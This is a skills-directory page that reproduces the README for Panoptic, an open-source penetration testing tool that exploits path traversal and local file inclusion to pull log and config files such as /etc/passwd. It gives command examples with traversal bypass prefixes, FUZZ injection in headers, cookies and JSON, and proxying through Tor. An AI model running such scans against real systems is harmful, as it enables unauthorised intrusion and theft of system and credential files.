SkillAgentSearch skills...

Panoptic

Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.

GenerateConvertImprove

Install / Use

/learn @lightos/Panoptic
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

Panoptic

Panoptic Logo

License: MIT Python Versions Ruff mypy GitHub last commit CodeRabbit Pull Request Reviews

Panoptic is an open source penetration testing tool that automates the search and retrieval of common log and config files through path traversal vulnerabilities.

Panoptic Demo

Features

  • Async concurrent scanning with configurable worker pool (--concurrency)
  • Automatic discovery of common log and configuration files via parameter-based, path-based, POST, cookie, header, and JSON body injection
  • FUZZ marker for arbitrary injection points — place FUZZ in any --header or --data value
  • Base64 encoding for endpoints that decode file paths (--base64)
  • Automatic OS detection with option to restrict further scans
  • Heuristic response comparison with status code filtering to reduce false positives
  • Dynamic case injection — parse /etc/passwd for home directory files, mysql-bin.index for binlog files
  • Multiple output formats: text (rich), JSON, CSV (--output-format)
  • Resume/checkpoint support for long-running scans (--resume-file)
  • TOML config files for persistent settings (--config)
  • Multiple traversal bypass techniques: prefixes, postfixes, multiplier, slash replacement, double encoding
  • HTTP/HTTPS and SOCKS4/SOCKS5 proxy support with validation
  • Random or custom User-Agent, cookie, and header support
  • Credential redaction in banner and log output
  • Self-update with remote URL verification (--update)

Requirements

  • Python 3.10+
  • Dependencies: httpx[socks], rich, rich-argparse

Installation

git clone https://github.com/lightos/Panoptic.git
cd Panoptic
pip install -e .

For development:

pip install -e ".[dev]"

Usage

panoptic --url "http://target/include.php?file=test.txt"

Examples

Basic parameter-based LFI

panoptic --url "http://target/include.php?file=test.txt"
panoptic --url "http://target/include.php?file=test.txt&id=1" \
  --param file

POST data injection

panoptic --url "http://target/include.php" \
  --data "file=test.txt&id=1" --param file

Path-based LFI

panoptic --url "http://target/view.php/test.txt" --path-based

Base64-encoded parameter

panoptic --url "http://target/load.php?file=dGVzdC50eHQ=" \
  --base64 --auto

Cookie injection (FUZZ marker)

panoptic --url "http://target/page.php" \
  --header "Cookie: lang=FUZZ" --auto

JSON body injection (FUZZ marker)

panoptic --url "http://target/api/load" \
  --data '{"file":"FUZZ"}' --auto

Custom header injection (FUZZ marker)

panoptic --url "http://target/page.php" \
  --header "X-Template: FUZZ" --auto

Extension parameter

panoptic --url "http://target/view.php?file=test&type=txt" \
  --param file --ext-param type

Filter bypass with prefix

panoptic --url "http://target/filtered.php?file=test.txt" \
  --prefix "....//....//....//....//"

Filtered scans

panoptic --url "http://target/include.php?file=test.txt" \
  --os "*NIX" --type conf
panoptic --url "http://target/include.php?file=test.txt" \
  --software PostgreSQL

JSON output with resume support

panoptic --url "http://target/include.php?file=test.txt" \
  --output-format json --output-file results.json \
  --resume-file scan.checkpoint

Proxy with SSL errors ignored

panoptic --url "https://target/include.php?file=test.txt" \
  --proxy "socks5://127.0.0.1:9050" --invalid-ssl

List available filters

panoptic --list software
panoptic --list category
panoptic --list os

Comprehensive scan

panoptic --url "http://target/include.php?file=test.txt" \
  --auto --all-versions --concurrency 8

FUZZ Marker

Place FUZZ anywhere in --header or --data values to mark the injection point. Panoptic replaces FUZZ with each file path during scanning. This enables testing injection points that --param can't reach:

| Injection Type | Example | | -------------- | ---------------------------------------- | | Cookie value | --header "Cookie: theme=FUZZ" | | Custom header | --header "X-Include: FUZZ" | | JSON body | --data '{"template":"FUZZ"}' | | Nested value | --header "Cookie: sid=abc; lang=FUZZ" |

When FUZZ is present, --param is not required.

Configuration

Panoptic supports TOML config files for persistent settings:

panoptic --url "http://target/include.php?file=test.txt" \
  --config ~/.config/panoptic/config.toml

Default config location: ~/.config/panoptic/config.toml

[defaults]
concurrency = 8
verbose = true
automatic = true

[proxy]
url = "socks5://127.0.0.1:9050"

[headers]
user_agent = "Mozilla/5.0"

Priority: CLI args > config file > built-in defaults.

Contributing

Contributions are welcome! Please open issues or pull requests on GitHub.

License

This project is licensed under the MIT License - see the LICENSE file for details.

Related Skills

node-connect

354.2k

Diagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps

frontend-design

112.2k

Create distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.

openai-whisper-api

354.2k

Transcribe audio via OpenAI Audio Transcriptions API (Whisper).

qqbot-media

354.2k

QQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。

lightos

View profile

View on GitHub
GitHub Stars321
CategoryDevelopment
Updated14d ago
Forks75
lightos/Panoptic

Languages

Python

Security Score

95/100

Audited on Mar 27, 2026

No findings